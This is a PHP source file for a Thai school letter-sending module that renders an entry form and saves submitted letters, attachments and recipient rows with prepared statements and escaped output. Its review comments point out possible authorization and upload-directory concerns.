Code Editor : send_book.php
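<script type="text/javascript" src="../../../css/js/calendarDateInput2.js"></script>
<?php
/**
 * send_book.php - form and handler a school user uses to send an official letter.
 *
 * $index == 1 (default) renders the entry form; $index == 4 validates the posted
 * form, stores up to five attachments and writes the book_main, book_filebook and
 * book_sendto_answer rows; any value other than 1 or 2 also prints the page title.
 *
 * Relies on names set by the including script: $connect (mysqli link), $index,
 * $remote_user_id, $remote_user_office, $remote_login_status, $remote_sync.
 *
 * NOTE(review): the remote_* values are round-tripped through hidden form fields
 * and query strings. If the including script populates them from the request,
 * the sender identity is client-controlled - confirm against the caller.
 */
defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' );
require_once "../time_inc.php";

if (!function_exists('send_book_h')) {
    /**
     * Escape a value for HTML text or a quoted attribute.
     *
     * ISO-8859-1 is passed on purpose: only the five ASCII markup characters are
     * rewritten and every other byte passes through untouched, so the output is
     * correct whether the stored text is UTF-8 or a single-byte Thai encoding.
     */
    function send_book_h($value)
    {
        return htmlspecialchars((string) $value, ENT_QUOTES, 'ISO-8859-1');
    }
}

if (!function_exists('send_book_exec')) {
    /**
     * Run a write statement with every value bound as a string parameter.
     *
     * @param mysqli $connect open database link
     * @param string $sql     statement text with one "?" per entry of $params
     * @param array  $params  values to bind, in placeholder order
     * @return bool true when the statement executed
     */
    function send_book_exec($connect, $sql, array $params)
    {
        $stmt = mysqli_prepare($connect, $sql);
        if (!$stmt) {
            error_log('send_book: prepare failed: ' . mysqli_error($connect));
            return false;
        }
        if (count($params) > 0) {
            // mysqli_stmt_bind_param() takes its values by reference.
            $args = array($stmt, str_repeat('s', count($params)));
            foreach ($params as $k => $unused) {
                $params[$k] = (string) $params[$k];
                $args[] = &$params[$k];
            }
            call_user_func_array('mysqli_stmt_bind_param', $args);
        }
        $ok = mysqli_stmt_execute($stmt);
        if (!$ok) {
            error_log('send_book: execute failed: ' . mysqli_stmt_error($stmt));
        }
        mysqli_stmt_close($stmt);
        return $ok;
    }
}

$user = $remote_user_id;

if (!isset($index) || $index == "") {
    $index = 1;
}

// Query-string fragment that carries the caller's session values across redirects.
// Cast to string so http_build_query() keeps empty values instead of dropping them.
$remote_params = array(
    'remote_user_office'  => (string) $remote_user_office,
    'remote_user_id'      => (string) $remote_user_id,
    'remote_login_status' => (string) $remote_login_status,
    'remote_sync'         => (string) $remote_sync,
);

// Page header
echo "<br />";
if (!(($index == 1) or ($index == 2))) {
    echo "<table width='100%' border='0' align='center'>";
    echo "<tr align='center'><td><font color='#006666' size='3'><strong>หนังสือส่ง</strong></font></td></tr>";
    echo "</table>";
}

// Entry form
if ($index == 1) {
    // Reference id that ties the letter, its attachments and its recipients
    // together: current Unix time, an "x", then a random number.
    $ref_id = time() . "x" . rand();

    echo "<form Enctype = multipart/form-data id='frm1' name='frm1'>";
    echo "<Center>";
    echo "<Font color='#006666' Size=3><B>ส่งหนังสือราชการ</Font>";
    echo "</Cener>";
    echo "<Br>";
    echo "<table border='1' width='700' id='table1' style='border-collapse: collapse' bordercolor='#C0C0C0'>";
    echo "<tr bgcolor='#003399'>";
    echo "<td colspan='4' height='23' align='left'><font size='2' color='#FFFFFF'> กรุณาระบุรายละเอียด</font></td>";
    echo "</tr>";

    // Sender: the school the current user belongs to.
    echo "<tr>";
    echo "<td width='94' align='right'><span lang='th'><font size='2' color='#0000FF'>จาก </font></span></td>";
    echo "<td width='514' colspan='3' align='left'>";
    $school_code = '';
    $school_name = '';
    $stmt_school = mysqli_prepare($connect, "select school_code, school_name from system_school where school_code = ?");
    if ($stmt_school) {
        mysqli_stmt_bind_param($stmt_school, 's', $remote_user_office);
        mysqli_stmt_execute($stmt_school);
        mysqli_stmt_bind_result($stmt_school, $school_code, $school_name);
        mysqli_stmt_fetch($stmt_school);
        mysqli_stmt_close($stmt_school);
    }
    echo " <input type='radio' name='workgroup' value='" . send_book_h($school_code) . "' checked> " . send_book_h($school_name);
    echo "</td>";
    echo "</tr>";

    // Recipient: central registry, one work group, every school, or a picked list.
    echo "<tr>";
    echo "<td width='94' align='right'><font size='2' color='#0000FF'>ถึง </font></span></td>";
    echo "<td colspan='3' align='left'> <input type='radio' value='saraban' name='sendto'> สารบรรณกลาง สพท.";
    $dbquery_workgroup = mysqli_query($connect, "select workgroup, workgroup_desc from system_workgroup");
    if ($dbquery_workgroup) {
        while ($result_workgroup = mysqli_fetch_array($dbquery_workgroup)) {
            echo "<br> <input type='radio' name='sendto' value='" . send_book_h($result_workgroup['workgroup']) . "'> " . send_book_h($result_workgroup['workgroup_desc']);
        }
    }
    echo "<br> <input type='radio' value='all' name='sendto'> สถานศึกษารัฐบาลทุกแห่ง";
    echo "<br> <input type='radio' value='some' name='sendto' onClick=\"window.open('../../../modules/book/expand/select_send.php?sd_index=some&ref_id=$ref_id','PopUp','width=900,height=600,scrollbars,status'); \"> สถานศึกษาบางแห่ง";
    echo "</td></tr>";

    // Urgency level
    echo "<tr>";
    echo "<td align='right'><span lang='th'><font size='2' color='#0000FF'>ระดับความสำคัญ </font></span></td>";
    echo "<td colspan='3' align='left'> <input type='radio' name='level' value='1' checked><font size='2' color='#006600'>ปกติ</font><span lang='en-us'><font size='2'> </font><input type='radio' name='level' value='2'></span><font size='2'><font color='#780634'>ด่วน</font> </font><input type='radio' name='level' value='3'><font size='2'><font color='#993300'>ด่วนมาก</font> </font><input type='radio' name='level' value='4'><font size='2' color='#FF0000'>ด่วนที่สุด</font></td>";
    echo "</tr>";

    // Confidentiality flag
    echo "<tr>";
    echo "<td align='right'><span lang='th'><font size='2' color='#0000FF'>ความลับ </font></span></td>";
    echo "<td colspan='3' align='left'> <input type='radio' name='secret' value='0' checked><font size='2' color='#006600'>ไม่ลับ</font><span lang='en-us'><font size='2'> </font><input type='radio' name='secret' value='1'><font size='2' color='#FF0000'>ลับ</font></td>";
    echo "</tr>";

    // Letter number and signing date
    echo "<tr>";
    echo "<td align='right'><span lang='th'><font size='2' color='#0000FF'>เลขที่หนังสือ </font></span></td><td> <FONT SIZE='2' COLOR=''></FONT><input type='text' name='bookno' size='20' value='ที่' style='background-color: #99ccff'> ลงวันที่</td>";
    echo "<td colspan='2' align='left'>";
    ?> <script>DateInput('signdate', true, 'YYYY-MM-DD')</script> <?php
    echo "</td>";
    echo "</tr>";

    // Subject and summary
    echo "<tr>";
    echo "<td align='right'><span lang='th'><font size='2' color='#0000FF'>เรื่อง </font></span></td>";
    echo "<td colspan='3' align='left'> <input type='text' name='subject' size='76' style='background-color: #99ccff'></td>";
    echo "</tr>";
    echo "<tr>";
    echo "<td width='94' align='right' height='47'><span lang='th'><font size='2' color='#0000FF'>เนื้อหาโดยสรุป </font></span></td>";
    echo "<td height='47' width='514' colspan='3' align='left'> <textarea rows='5' name='detail' cols='55' style='background-color: #99ccff' ></textarea></td>";
    echo "</tr>";

    // Attachments: five file inputs, each with a description field.
    echo "<tr>";
    echo "<td width='371' align='right' colspan='2'><p align='center'><font size='2' color='#800000'>แนบไฟล์(ถ้ามี)</font></td>";
    echo "<td width='238' align='center' colspan='2'><p align='center'><font size='2' color='#800000'>คำอธิบายไฟล์</font></td>";
    echo "</tr>";
    for ($n = 1; $n <= 5; $n++) {
        echo "<tr>";
        echo "<td width='94' align='right'><font size='2' color='#0000FF'>ไฟล์แนบ {$n} </font></td>";
        echo "<td width='274'> <input type='file' name='myfile{$n}' size='26' style='background-color: #99ccff'></td>";
        echo "<td width='238' align='center' colspan='2'><input type='text' name='dfile{$n}' size='31' style='background-color: #E5E5FF'></td>";
        echo "</tr>";
    }
    echo "<tr>";
    echo "<td align='center' colspan='4'><FONT SIZE='2' COLOR='#CC9900'>เฉพาะไฟล์ doc, docx, pdf, xls, xlsx, gif, jpg, zip, rar เท่านั้น</FONT></td>";
    echo "</tr>";
    echo "<input name='ref_id' type='hidden' value='$ref_id'>";
    echo "<tr>";
    echo "<td align='center' colspan='4'><BR><INPUT TYPE='button' name='smb' id='smb' value='ตกลง' onclick='goto_url(1)'> <input type='reset' value='Reset' name='reset'></td>";
    echo "</tr>";
    echo "</Table>";
    foreach ($remote_params as $remote_name => $remote_value) {
        echo "<input type='hidden' name='$remote_name' value='" . send_book_h($remote_value) . "'>";
    }
    echo "</form>";
}

// Save the submitted letter
if ($index == 4) {
    $sizelimit   = 20000 * 1024;   // per-attachment size cap, in bytes
    $allowed_ext = array("doc", "docx", "rar", "pdf", "xls", "xlsx", "zip", "jpg", "gif");
    // NOTE(review): this directory is addressed relative to the web tree; if it is
    // served by the web server, make sure script execution is disabled inside it.
    $upload_dir  = "../../../modules/book/upload_files/";

    // Read each posted field once; missing or non-string fields become "".
    $form = array();
    $field_names = array(
        'sendto', 'subject', 'detail', 'workgroup', 'level', 'secret',
        'bookno', 'signdate', 'ref_id',
        'dfile1', 'dfile2', 'dfile3', 'dfile4', 'dfile5',
    );
    foreach ($field_names as $field) {
        $form[$field] = (isset($_POST[$field]) && is_string($_POST[$field])) ? $_POST[$field] : '';
    }
    $ref_id_post = $form['ref_id'];

    // Check the extension and size of every attachment that was actually sent.
    $uploads        = array();
    $alert_files    = "";
    $alert_filesize = "";
    for ($n = 1; $n <= 5; $n++) {
        $key = 'myfile' . $n;
        if (!isset($_FILES[$key]) || !is_string($_FILES[$key]['tmp_name']) || $_FILES[$key]['tmp_name'] == "") {
            continue;
        }
        $client_name = (string) $_FILES[$key]['name'];
        $dot = strrpos($client_name, '.');
        $ext = ($dot === false) ? '' : strtolower(substr($client_name, $dot + 1));

        // The client-supplied file name is echoed back, so it is escaped here.
        if (!in_array($ext, $allowed_ext, true)) {
            $alert_files .= "-ไม่อนุญาตให้ทำการแนบไฟล์ " . send_book_h($client_name) . " ";
        }
        if ($_FILES[$key]['size'] > $sizelimit) {
            $alert_filesize .= "-ไฟล์ " . send_book_h($client_name) . " มีขนาดใหญ่กว่าที่กำหนด ";
        }
        $uploads[$n] = array('tmp' => $_FILES[$key]['tmp_name'], 'ext' => $ext);
    }

    // Required fields
    if ($form['sendto'] === "" || $form['subject'] === "" || $form['detail'] === "") {
        echo "<CENTER><font size=\"2\" color=\"#008000\">กรอกข้อมูลไม่ครบ หรืออาจอัพโหลดไฟล์ใหญ่เกินข้อกำหนดของServer<br><br>";
        echo "<input type=\"button\" value=\"แก้ไขข้อมูล\" onClick=\"javascript:history.go(-1)\" ></CENTER>";
        exit();
    }

    // Attachment name / size problems
    if ($alert_files <> "" || $alert_filesize <> "") {
        echo "<B><FONT SIZE=2 COLOR=#990000>มีข้อผิดพลาดเกี่ยวกับไฟล์ของคุณ ดังรายละเอียด</FONT></B><BR>";
        echo "<FONT SIZE=2 COLOR=#990099>";
        echo $alert_files;
        echo $alert_filesize;
        echo "</FONT>";
        echo " <input type=\"button\" value=\" แก้ไข \" onClick=\"javascript:history.go(-1)\" ></CENTER>";
        exit();
    }

    // When sending to selected schools, the recipient rows must already exist
    // for this ref_id (the select_send.php popup is opened with the same id).
    $send_num = 0;
    $stmt_count = mysqli_prepare($connect, "SELECT COUNT(*) FROM book_sendto_answer WHERE ref_id = ?");
    if ($stmt_count) {
        mysqli_stmt_bind_param($stmt_count, 's', $ref_id_post);
        mysqli_stmt_execute($stmt_count);
        mysqli_stmt_bind_result($stmt_count, $send_num);
        mysqli_stmt_fetch($stmt_count);
        mysqli_stmt_close($stmt_count);
    }
    if ($send_num == 0 and $form['sendto'] == 'some') {
        echo "<div align='center'>";
        echo "<B><FONT SIZE=2 COLOR=#990000>ยังไม่ได้ระบุผู้รับหนังสือ</FONT></B><BR><BR>";
        echo " <input type=\"button\" value=\" แก้ไข \" onClick=\"javascript:history.go(-1)\" ></CENTER>";
        echo "</div>";
        exit();
    }

    $day_now   = date("Y-m-d H:i:s");
    $book_type = 2;   // the sender is a school

    // ref_id becomes part of the stored attachment file name, so only the shape
    // the form generates (digits, "x", digits) is accepted; a missing, empty or
    // malformed value sends the user back to a fresh form.
    if (!preg_match('/\A[0-9]+x[0-9]+\z/', $ref_id_post)) {
        $retry_url = '?' . http_build_query(array('file' => 'send_book', 'index' => 1) + $remote_params, '', '&');
        echo "<script>alert('มีข้อผิดพลาดเกี่ยวกับเลขอ้างอิงในระบบ ยกเลิกการส่งหนังสือในครั้งนี้ กรุณาส่งใหม่อีกครั้ง'); document.location.href=" . json_encode($retry_url) . ";</script>";
        exit();
    }

    // NOTE(review): office is taken from the posted "workgroup" radio rather than
    // from $remote_user_office, so the client chooses the sending office - verify
    // that this is intended.
    send_book_exec(
        $connect,
        "insert into book_main (book_type, office, sender, level, secret, bookno, signdate, subject, detail, ref_id, send_date) values (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
        array(
            $book_type, $form['workgroup'], $user, $form['level'], $form['secret'],
            $form['bookno'], $form['signdate'], $form['subject'], $form['detail'],
            $ref_id_post, $day_now,
        )
    );

    // Store each attachment as <ref_id>_<slot>.<checked extension>; the
    // client-supplied file name never reaches the file system.
    foreach ($uploads as $n => $upload) {
        $stored_name = $ref_id_post . "_" . $n . "." . $upload['ext'];
        $target      = $upload_dir . $stored_name;
        // move_uploaded_file() refuses any path that is not a genuine upload.
        if (!move_uploaded_file($upload['tmp'], $target)) {
            error_log('send_book: could not store attachment ' . $n . ' for ref_id ' . $ref_id_post);
            continue;
        }
        // A moved upload keeps the temp file's restrictive mode; 0644 assumes the
        // earlier copy() ran under a 022 umask - TODO confirm.
        chmod($target, 0644);
        send_book_exec(
            $connect,
            "insert into book_filebook (ref_id, file_name, file_des) values (?, ?, ?)",
            array($ref_id_post, $stored_name, $form['dfile' . $n])
        );
    }

    // Recipient rows. 'some' needs nothing here: its rows were counted above.
    if ($form['sendto'] == 'all') {
        // Every school of type 1 except the sender's own.
        $school_codes = array();
        $stmt_sendto = mysqli_prepare($connect, "select school_code from system_school where school_code != ? and school_type='1' order by school_code");
        if ($stmt_sendto) {
            $code = '';
            mysqli_stmt_bind_param($stmt_sendto, 's', $remote_user_office);
            mysqli_stmt_execute($stmt_sendto);
            mysqli_stmt_bind_result($stmt_sendto, $code);
            while (mysqli_stmt_fetch($stmt_sendto)) {
                $school_codes[] = $code;
            }
            mysqli_stmt_close($stmt_sendto);
        }
        $stmt_insert = mysqli_prepare($connect, "insert into book_sendto_answer (send_level, ref_id, send_to) values ('3', ?, ?)");
        if ($stmt_insert) {
            $send_to = '';
            mysqli_stmt_bind_param($stmt_insert, 'ss', $ref_id_post, $send_to);
            foreach ($school_codes as $code) {
                $send_to = (string) $code;   // bound by reference: re-read on each execute
                mysqli_stmt_execute($stmt_insert);
            }
            mysqli_stmt_close($stmt_insert);
        }
    } else if ($form['sendto'] != 'some') {
        send_book_exec(
            $connect,
            "insert into book_sendto_answer (send_level, ref_id, send_to) values ('2', ?, ?)",
            array($ref_id_post, $form['sendto'])
        );
    }

    $report_url = '?' . http_build_query(array('file' => 'send_report_book') + $remote_params, '', '&');
    echo "<script>document.location.href=" . json_encode($report_url) . ";</script>\n";
} // end index 4
?>
<script>
/**
 * Client-side checks for the send form. These only help the user; the
 * server-side handler repeats the checks that matter.
 *
 * val == 0: return to the start page. val == 1: validate, then submit.
 */
function goto_url(val) {
    var frm = document.frm1;
    var i;

    if (val == 0) {
        callfrm("?file=send_book");   // back to the start page
        return;
    }
    if (val != 1) {
        return;
    }

    // A sender radio must be selected.
    var w_group = document.getElementsByName("workgroup");
    var wg = 0;
    for (i = 0; i < w_group.length; i++) {
        if (w_group[i].checked == true) {
            wg = 1;
        }
    }
    if (wg == 0) {
        alert("กรุณาเลือกผู้ส่ง (จาก)");
        return;
    }
    if (frm.bookno.value == "") {
        alert("กรุณากรอกเลขที่หนังสือ");
        frm.bookno.focus();
        return;
    }
    if (frm.subject.value.length == 0) {
        alert("กรุณากรอกชื่อเรื่อง");
        frm.subject.focus();
        return;
    }
    if (frm.detail.value.length == 0) {
        alert("กรุณากรอกเนื้อหาโดยสรุป");
        frm.detail.focus();
        return;
    }
    // The first attachment is mandatory.
    if (frm.myfile1.value == "") {
        alert("กรุณาเลือกไฟล์");
        frm.myfile1.focus();
        return;
    }
    // Every chosen attachment needs a description.
    for (i = 1; i <= 5; i++) {
        if (frm["myfile" + i].value != "" && frm["dfile" + i].value == "") {
            alert("กรุณากรอก คำอธิบายไฟล์");
            frm["dfile" + i].focus();
            return;
        }
    }

    // Hide the submit button so the form cannot be sent twice.
    document.getElementById("smb").style.display = "none";
    callfrm("?file=send_book&index=4");   // processing page
}
</script>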